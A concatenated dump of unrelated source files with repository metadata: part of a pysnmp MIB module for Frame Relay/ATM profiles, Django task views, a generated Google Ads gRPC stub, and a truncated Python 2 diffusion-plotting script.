if mibBuilder.loadTexts: profileFrf8FecnMode.setDescription('If the Fecn mode is set to mapped, the FECN field in the Q922 core frame is mapped to the ATM EFCI field of every cell generated by the segmentation process of the AAL5 PDU containing the information of that frame. This mode provides congestion indication to the end-points where higher layer protocol entities might be involved in traffic control mechanisms. Otherwise, the EFCI field of cells generated by the segmentation process of the AAL5 PDU containing the information of the frame is always set to congestion-not-experienced.')
profileFrf8DefaultDe = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8DefaultDe.setStatus('current')
if mibBuilder.loadTexts: profileFrf8DefaultDe.setDescription('This object represents the DE bit value of all generated FR frame headers if the CLP mode is set to ignored.')
profileFrf8DefaultClp = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8DefaultClp.setStatus('current')
if mibBuilder.loadTexts: profileFrf8DefaultClp.setDescription('This object represents the CLP bit value of all generated ATM cell headers if the DE mode is set to ignored.')
profileFrf8Protocols = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8191))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileFrf8Protocols.setStatus('current')
if mibBuilder.loadTexts: profileFrf8Protocols.setDescription('This object represents a binary map which lists all possible encapsulation translation protocols over this FRF.8 IWF instance. Any combination of the specified encapsulation modes will be supported. The binary map assignment is defined as below: ethernet (0000000000001) ethernetFcs (0000000000010) tokenRing (0000000000100) tokenRingFcs (0000000001000) ipRouted (0000000010000) arp (0000000100000) ipx (0000001000000) sna (0000010000000) fddi (0000100000000) fddiFcs (0001000000000) x.25/75 (0010000000000) 802.6 (0100000000000) routedIso (1000000000000) or any combinations of the binary map. The allowable range of the input is from 0 to 8191. This object corresponds to frf8ProtProtocol in fore-frf8 MIB.')
profileFrf8RefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 4, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf8RefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFrf8RefCnt.setDescription('The value of this object identifies the number of connections that are currently referring to this profile.')
profileServiceTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5), )
if mibBuilder.loadTexts: profileServiceTable.setStatus('current')
if mibBuilder.loadTexts: profileServiceTable.setDescription('The generic service profile table.')
profileServiceEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileServiceIndex"))
if mibBuilder.loadTexts: profileServiceEntry.setStatus('current')
if mibBuilder.loadTexts: profileServiceEntry.setDescription('An entry in the generic service profile table.')
profileServiceIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileServiceIndex.setStatus('current')
if mibBuilder.loadTexts: profileServiceIndex.setDescription('This object identifies the index of a profile in this table.')
profileServiceRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileServiceRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileServiceName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceName.setStatus('current')
if mibBuilder.loadTexts: profileServiceName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileServiceAccRate = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 4), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceAccRate.setStatus('current')
if mibBuilder.loadTexts: profileServiceAccRate.setDescription('This object represents the access rate of the service (kbps).')
profileServiceMaxVccs = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 5), Integer32().clone(10)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceMaxVccs.setStatus('current')
if mibBuilder.loadTexts: profileServiceMaxVccs.setDescription('The maximum number of virtual circuits supported in this service. This object corresponds to frDlcmiMaxSupportedVCs in RFC1315 and funiIfExtConfVccs in fore-funi MIB.')
profileServiceMaxPayloadSize = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 6), Integer32().clone(4096)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceMaxPayloadSize.setStatus('current')
if mibBuilder.loadTexts: profileServiceMaxPayloadSize.setDescription('This object represents the maximum payload size (bytes) supported by the service. This object corresponds to frPVCEndptInMaxFrameSize and frPVCEndptOutMaxFrameSize in RFC1604.')
profileServiceInBwOb = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 500)).clone(100)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceInBwOb.setStatus('current')
if mibBuilder.loadTexts: profileServiceInBwOb.setDescription('This object represents the bandwidth overbooking (percentage) of the service in the inbound direction. If the percentage is bigger than 100%, it is overbooking; otherwise it is underbooking.')
profileServiceOutBwOb = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 500)).clone(100)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceOutBwOb.setStatus('current')
if mibBuilder.loadTexts: profileServiceOutBwOb.setDescription('This object represents the bandwidth overbooking (percentage) of the service in the outbound direction. If the percentage is bigger than 100%, it is overbooking; otherwise it is underbooking.')
profileServiceRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileServiceRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileServiceRefCnt.setDescription('The value of this object identifies the number of services that are currently referring to this profile.')
profileEpdPpdTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6), )
if mibBuilder.loadTexts: profileEpdPpdTable.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdTable.setDescription('The EPD/PPD profile table.')
profileEpdPpdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileEpdPpdIndex"))
if mibBuilder.loadTexts: profileEpdPpdEntry.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdEntry.setDescription('An entry in the EPD/PPD profile table.')
profileEpdPpdIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileEpdPpdIndex.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdIndex.setDescription('This object identifies the index of a profile in this table.')
profileEpdPpdRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileEpdPpdName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdName.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileEpdPpdPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("low", 1), ("high", 2))).clone('low')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdPriority.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdPriority.setDescription('This object specifies the EPD/PPD priority queue the connection is assigned.')
profileEpdPpdClp0Epd = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('enabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdClp0Epd.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdClp0Epd.setDescription('This object specifies whether the EPD/PPD controller discards CLP=0 traffic after the Clp0Epd threshold has been hit.')
profileEpdPpdClp1Ppd = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('enabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdClp1Ppd.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdClp1Ppd.setDescription('This object specifies whether the EPD/PPD controller discards CLP=1 traffic after the Clp1Ppd threshold has been hit.')
profileEpdPpdClp1Epd = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('enabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdClp1Epd.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdClp1Epd.setDescription('This object specifies whether the EPD/PPD controller discards CLP=1 traffic after the Clp1Epd threshold has been hit.')
profileEpdPpdRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileEpdPpdRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdRefCnt.setDescription('The value of this object identifies the number of connections that are currently referring to this profile.')
profileFrf5Table = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7), )
if mibBuilder.loadTexts: profileFrf5Table.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Table.setDescription('The FRF.5 profile table.')
profileFrf5Entry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFrf5Index"))
if mibBuilder.loadTexts: profileFrf5Entry.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Entry.setDescription('An entry in the FRF.5 profile table.')
profileFrf5Index = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf5Index.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Index.setDescription('This object identifies the index of a profile in this table. Indices 1 though 20 are reserved for system defaults')
profileFrf5RowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 2), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5RowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFrf5RowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFrf5Name = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5Name.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Name.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileFrf5DeMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5DeMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf5DeMode.setDescription('If the DE mode is set to mapped, the DE field in the FR_SSCS frame is mapped to the ATM CLP filled of every cell generated by the segmentation process of the AAL5 PDU containing the information of that frame. Otherwise, if the DE mode is set to ignored, the ATM CLP of every ATM cell generated by the segmentation process of the AAL5 PDU containing the information of that frame is set to a constant value specified by the configuration parameter profileFrf5DefaultClp.')
profileFrf5ClpFrsscsDeMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5ClpFrsscsDeMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf5ClpFrsscsDeMode.setDescription('If the CLP mode is set to mapped, the FR/ATM network interworking function will set the DE field of the Q922 core frame, provided that one or more cells belonging to this frame has its CLP field set, or the DE bit of FR_SSCS frame is set. Otherwise, if the CLP mode is set to ignored, the DE bit of FR_SSCS frame is copied to the Q922 core frame.')
profileFrf5DefaultClp = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5DefaultClp.setStatus('current')
if mibBuilder.loadTexts: profileFrf5DefaultClp.setDescription('This object represents the CLP bit value of all generated ATM cell headers if the DE mode is set to ignored.')
profileFrf5MaxDlcis = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 7), Integer32().clone(5)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5MaxDlcis.setStatus('current')
if mibBuilder.loadTexts: profileFrf5MaxDlcis.setDescription('The maximum number of virtual circuits supported in this VCC.')
profileFrf5MaxPayloadSize = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 8), Integer32().clone(4092)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5MaxPayloadSize.setStatus('current')
if mibBuilder.loadTexts: profileFrf5MaxPayloadSize.setDescription('This object represents the maximum payload size (bytes) supported by the VCC.')
profileFrf5RefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf5RefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFrf5RefCnt.setDescription('The value of this object identifies the number of connections that are currently referring to this profile.')
mibBuilder.exportSymbols("Fore-Profile-MIB", profileLmiT391=profileLmiT391, profileFuniSigSupport=profileFuniSigSupport, profileLmiN391=profileLmiN391, profileFrf8FecnMode=profileFrf8FecnMode, profileLmiEntry=profileLmiEntry, profileFrRateRefCnt=profileFrRateRefCnt, profileFrf5RefCnt=profileFrf5RefCnt, profileServiceIndex=profileServiceIndex, profileFuniRefCnt=profileFuniRefCnt, profileServiceInBwOb=profileServiceInBwOb, foreProfileModule=foreProfileModule, profileEpdPpdTable=profileEpdPpdTable, profileFrRateInBc=profileFrRateInBc, profileFuniAal34Support=profileFuniAal34Support, profileFrf5Index=profileFrf5Index, profileFuniSigVci=profileFuniSigVci, profileFrf8Protocols=profileFrf8Protocols, profileEpdPpdClp1Epd=profileEpdPpdClp1Epd, profileServiceEntry=profileServiceEntry, profileFuniHdrBytes=profileFuniHdrBytes, profileFrf8Table=profileFrf8Table, profileEpdPpdRowStatus=profileEpdPpdRowStatus, profileEpdPpdIndex=profileEpdPpdIndex, profileFrf5Table=profileFrf5Table, profileFrf5DeMode=profileFrf5DeMode, PYSNMP_MODULE_ID=foreProfileModule, profileFrf5Entry=profileFrf5Entry, profileFuniIlmiVpi=profileFuniIlmiVpi, profileLmiN393=profileLmiN393, profileLmiRole=profileLmiRole, profileFrf5Name=profileFrf5Name, profileFrf8DeMode=profileFrf8DeMode, profileFuniMinVci=profileFuniMinVci, profileServiceAccRate=profileServiceAccRate, profileFrRateInBe=profileFrRateInBe, profileFuniFcsBits=profileFuniFcsBits, profileEpdPpdRefCnt=profileEpdPpdRefCnt, profileServiceTable=profileServiceTable, profileServiceName=profileServiceName, profileFrf8Index=profileFrf8Index, profileFuniIlmiVci=profileFuniIlmiVci, profileLmiRowStatus=profileLmiRowStatus, profileLmiIndex=profileLmiIndex, profileEpdPpdPriority=profileEpdPpdPriority, profileFrRateIndex=profileFrRateIndex, profileServiceMaxVccs=profileServiceMaxVccs, profileFrRateTable=profileFrRateTable, profileLmiRefCnt=profileLmiRefCnt, profileFuniOamSupport=profileFuniOamSupport, profileServiceOutBwOb=profileServiceOutBwOb, 
profileFrf5DefaultClp=profileFrf5DefaultClp, profileServiceRowStatus=profileServiceRowStatus, profileEpdPpdEntry=profileEpdPpdEntry, profileLmiName=profileLmiName, profileFuniActiveVciBits=profileFuniActiveVciBits, profileLmiN392=profileLmiN392, profileFrf8DefaultDe=profileFrf8DefaultDe, profileEpdPpdClp1Ppd=profileEpdPpdClp1Ppd, profileFrf8RefCnt=profileFrf8RefCnt, profileFrRateOutCir=profileFrRateOutCir, profileFrRateCmPeriod=profileFrRateCmPeriod, profileFuniActiveVpiBits=profileFuniActiveVpiBits, profileLminT3=profileLminT3, profileFrRateOutBc=profileFrRateOutBc, profileFrRateName=profileFrRateName, profileFrf8ClpMode=profileFrf8ClpMode, profileFrf8DefaultClp=profileFrf8DefaultClp, profileFrf5MaxDlcis=profileFrf5MaxDlcis, profileEpdPpdName=profileEpdPpdName, profileFrRateEntry=profileFrRateEntry, profileFrRateOutBe=profileFrRateOutBe, profileFrf5RowStatus=profileFrf5RowStatus, profileFuniMaxVci=profileFuniMaxVci, profileFrf8Entry=profileFrf8Entry, profileLmiT392=profileLmiT392, profileLmiDirection=profileLmiDirection, profileFrRateRowStatus=profileFrRateRowStatus, profileLmiTable=profileLmiTable, profileFrRateMinBc=profileFrRateMinBc, profileServiceRefCnt=profileServiceRefCnt, profileFrf5ClpFrsscsDeMode=profileFrf5ClpFrsscsDeMode, profileFuniName=profileFuniName, profileFuniIlmiSupport=profileFuniIlmiSupport, profileLmiFlavour=profileLmiFlavour, profileFuniSigVpi=profileFuniSigVpi, profileServiceMaxPayloadSize=profileServiceMaxPayloadSize, profileFuniIndex=profileFuniIndex, profileFrRateInCir=profileFrRateInCir, profileFuniConfMode=profileFuniConfMode, profileFuniRowStatus=profileFuniRowStatus, profileFuniEntry=profileFuniEntry, profileFuniTable=profileFuniTable, profileFrf8RowStatus=profileFrf8RowStatus, profileFrf5MaxPayloadSize=profileFrf5MaxPayloadSize, profileFrf8Name=profileFrf8Name, profileEpdPpdClp0Epd=profileEpdPpdClp0Epd)
| [
"[email protected]"
] | |
d8762f137096c890036178284a83d2b8d954379e | cc535054eea53a16756397a017604bc160e35c8e | /tasks/views.py | bed70a9d2c86b9a14133666af5fc63a357f446d8 | [
"MIT"
] | permissive | DevYanB/django-test-ci | 44d1404e9efbd1107393080177d0f08089b45544 | b36cf4138512f9578bfdd81a00d1a719f1148d01 | refs/heads/master | 2022-08-19T10:11:51.448879 | 2020-05-26T06:30:52 | 2020-05-26T06:30:52 | 265,990,666 | 0 | 0 | MIT | 2020-05-22T01:32:19 | 2020-05-22T01:32:19 | null | UTF-8 | Python | false | false | 2,231 | py | """
Task app: Views file
"""
from django.shortcuts import (
render_to_response
)
from django.views.generic import ListView, TemplateView, DetailView
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.urls import reverse_lazy
from tasks.models import Task
class TaskList(ListView):
"""
Task list Generic List View
"""
model = Task
ordering = ['-task_created']
def get_context_data(self, **kwargs):
context = super(TaskList, self).get_context_data(**kwargs)
context.update({'nlink': 'list'})
return context
class TaskCreate(CreateView):
"""
Task list Generic Create View
"""
model = Task
fields = ['task_title', 'task_description']
success_url = reverse_lazy('tasks:tasks_list')
def get_context_data(self, **kwargs):
context = super(TaskCreate, self).get_context_data(**kwargs)
context.update({'nlink': 'new'})
return context
class TaskDetails(DetailView):
"""
Task list Detail View
"""
model = Task
fields = ['task_title', 'task_description', 'task_created', 'task_updated']
class TaskUpdate(UpdateView):
"""
Task list Update View
"""
model = Task
fields = ['task_title', 'task_description']
success_url = reverse_lazy('tasks:tasks_list')
def get_context_data(self, **kwargs):
context = super(TaskUpdate, self).get_context_data(**kwargs)
context.update({'nlink': 'update'})
return context
class TaskDelete(DeleteView):
"""
Task list Delete View
"""
model = Task
success_url = reverse_lazy('tasks:tasks_list')
class Custom500(TemplateView):
"""
Task list Custom 500 View
"""
template_name = 'tasks/500.html'
def page_not_found(request, exception):
"""
function to return view http error 404.
"""
response = render_to_response(
'tasks/404.html',
{}
)
response.status_code = 404
return response
def server_error(request):
"""
function to return view http error 500.
"""
response = render_to_response(
'tasks/500.html',
{}
)
response.status_code = 500
return response
| [
"[email protected]"
] | |
8e44e19cb130be2674e367d7430f443fce19e273 | a81c1492783e7cafcaf7da5f0402d2d283b7ce37 | /google/ads/google_ads/v6/proto/services/topic_constant_service_pb2_grpc.py | a88d68b33e4145681b9962007e441f8bbe5a1ed7 | [
"Apache-2.0"
] | permissive | VincentFritzsche/google-ads-python | 6650cf426b34392d1f58fb912cb3fc25b848e766 | 969eff5b6c3cec59d21191fa178cffb6270074c3 | refs/heads/master | 2023-03-19T17:23:26.959021 | 2021-03-18T18:18:38 | 2021-03-18T18:18:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,418 | py | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.ads.google_ads.v6.proto.resources import topic_constant_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2
from google.ads.google_ads.v6.proto.services import topic_constant_service_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2
class TopicConstantServiceStub(object):
"""Proto file describing the Topic constant service
Service to fetch topic constants.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetTopicConstant = channel.unary_unary(
'/google.ads.googleads.v6.services.TopicConstantService/GetTopicConstant',
request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2.GetTopicConstantRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2.TopicConstant.FromString,
)
class TopicConstantServiceServicer(object):
"""Proto file describing the Topic constant service
Service to fetch topic constants.
"""
def GetTopicConstant(self, request, context):
"""Returns the requested topic constant in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TopicConstantServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetTopicConstant': grpc.unary_unary_rpc_method_handler(
servicer.GetTopicConstant,
request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2.GetTopicConstantRequest.FromString,
response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2.TopicConstant.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v6.services.TopicConstantService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TopicConstantService(object):
"""Proto file describing the Topic constant service
Service to fetch topic constants.
"""
@staticmethod
def GetTopicConstant(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.TopicConstantService/GetTopicConstant',
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2.GetTopicConstantRequest.SerializeToString,
google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2.TopicConstant.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| [
"[email protected]"
] | |
7dcf96accdcf4db049e9177294638d59a30e4830 | d1496657ee41a5c78ba4e1d5e47b52711194f938 | /Langevin/src/03_analyze_harmonicDiffusion.py | 2f67ae6f77d87d9438e1b0d13b1afbe76ff7b708 | [] | no_license | khx0/diffusionTools | 816aed59485e7dc1fc46bad39cd8e03e3933b2ce | 0f36998bfe04d04a48715c3aff396ef2279ee2f8 | refs/heads/master | 2021-04-27T15:49:22.604995 | 2018-05-28T07:23:01 | 2018-05-28T07:23:01 | 122,477,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,792 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
##########################################################################################
# author: Nikolas Schnellbaecher
# contact: [email protected]
# date: 2018-05-27
# file: 03_analyze_harmonicDiffusion.py
##########################################################################################
import time
import datetime
import sys
import os
import math
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
from matplotlib import rc
from matplotlib.pyplot import legend
import matplotlib.colors as colors
import matplotlib.cm as cmx
from Langevin import getMoments
def ensure_dir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
now = datetime.datetime.now()
now = "%s-%s-%s" %(now.year, str(now.month).zfill(2), str(now.day).zfill(2))
BASEDIR = os.path.dirname(os.path.abspath(__file__))
RAWDIR = os.path.join(BASEDIR, 'raw')
OUTDIR = os.path.join(BASEDIR, 'out')
ensure_dir(OUTDIR)
def getFigureProps(width, height, lFrac = 0.17, rFrac = 0.9, bFrac = 0.17, tFrac = 0.9):
'''
True size scaling auxiliary function to setup mpl plots with a desired size in cm.
Specify widht and height in cm.
lFrac = left fraction in [0, 1]
rFrac = right fraction in [0, 1]
bFrac = bottom fraction in [0, 1]
tFrac = top fraction in [0, 1]
returns:
fWidth = figure width
fHeight = figure height
These figure width and height values can then be used to create a figure instance
of the desired size, such that the actual plotting canvas has the specified
target width and height, as provided by the input parameters of this function.
'''
axesWidth = width / 2.54 # convert to inches (1 inch = 2.54 cm)
axesHeight = height / 2.54 # convert to inches
fWidth = axesWidth / (rFrac - lFrac)
fHeight = axesHeight / (tFrac - bFrac)
return fWidth, fHeight, lFrac, rFrac, bFrac, tFrac
def Plot(titlestr, X, MSD, outname, outdir, grid = True,
savePDF = True, savePNG = False, datestamp = True):
mpl.rcParams['xtick.top'] = False
mpl.rcParams['xtick.bottom'] = True
mpl.rcParams['ytick.right'] = False
mpl.rcParams['xtick.direction'] = 'out'
mpl.rcParams['ytick.direction'] = 'out'
mpl.rc('font',**{'size': 10})
mpl.rc('legend',**{'fontsize': 5.5})
mpl.rc("axes", linewidth = 0.5)
plt.rc('font', **{'family' : 'sans-serif', 'sans-serif' : ['Helvetica']})
plt.rcParams['pdf.fonttype'] = 42
mpl.rcParams['text.usetex'] = False
mpl.rcParams['mathtext.fontset'] = 'cm'
fontparams = {'text.latex.preamble': [r'\usepackage{cmbright}', r'\usepackage{amsmath}']}
mpl.rcParams.update(fontparams)
######################################################################################
# set up figure
fWidth, fHeight, lFrac, rFrac, bFrac, tFrac =\
getFigureProps(width = 5.5, height = 4.0,
lFrac = 0.16, rFrac = 0.95, bFrac = 0.17, tFrac = 0.92)
f, ax1 = plt.subplots(1)
f.set_size_inches(fWidth, fHeight)
f.subplots_adjust(left = lFrac, right = rFrac)
f.subplots_adjust(bottom = bFrac, top = tFrac)
######################################################################################
major_x_ticks = np.arange(-4.0, 4.1, 2.0)
minor_x_ticks = np.arange(-4.0, 4.1, 1.0)
ax1.set_xticks(major_x_ticks)
ax1.set_xticks(minor_x_ticks, minor = True)
major_y_ticks = np.arange(0.0, 1.05, 0.2)
minor_y_ticks = np.arange(0.0, 1.05, 0.1)
ax1.set_yticks(major_y_ticks)
ax1.set_yticks(minor_y_ticks, minor = True)
labelfontsize = 8.0
for tick in ax1.xaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
for tick in ax1.yaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
xticks = plt.getp(plt.gca(), 'xticklines')
yticks = plt.getp(plt.gca(), 'yticklines')
ax1.tick_params('both', length = 2.5, width = 0.5, which = 'major', pad = 2.0)
ax1.tick_params('both', length = 1.75, width = 0.35, which = 'minor', pad = 2.0)
######################################################################################
# labeling
plt.title(titlestr)
ax1.set_xlabel(r'position $x$', fontsize = 8.0)
ax1.set_ylabel(r'$p(x,t\, |\, x_0,t_0)$', fontsize = 8.0)
ax1.xaxis.labelpad = 2.0
ax1.yaxis.labelpad = 5.0
######################################################################################
# cmap settings
sampleTimes = [0.5, 1.0, 3.0, 5.0, 10.0]
ColorMap = cmx.viridis
cNorm = mpl.colors.LogNorm(vmin = sampleTimes[0], vmax = 12.2)
scalarMap = cmx.ScalarMappable(norm = cNorm, cmap = ColorMap)
print "Colormap colornorm limits =", scalarMap.get_clim()
######################################################################################
# plotting
nSamples = len(sampleTimes)
xVals = np.linspace(-6.0, 6.0, 2000)
labels = [r'$t = 0.5$',
r'$t = 1$',
r'$t = 3$',
r'$t = 5$',
r'$t = 10$']
for i in range(nSamples):
RGBcolorValue = scalarMap.to_rgba(sampleTimes[i])
ax1.plot(xVals, FPE_drift(xVals, x0 = x0Value, t = sampleTimes[i]),
color = RGBcolorValue,
lw = 1.0)
counts, bins = np.histogram(X[i, :], bins = 30, normed = True)
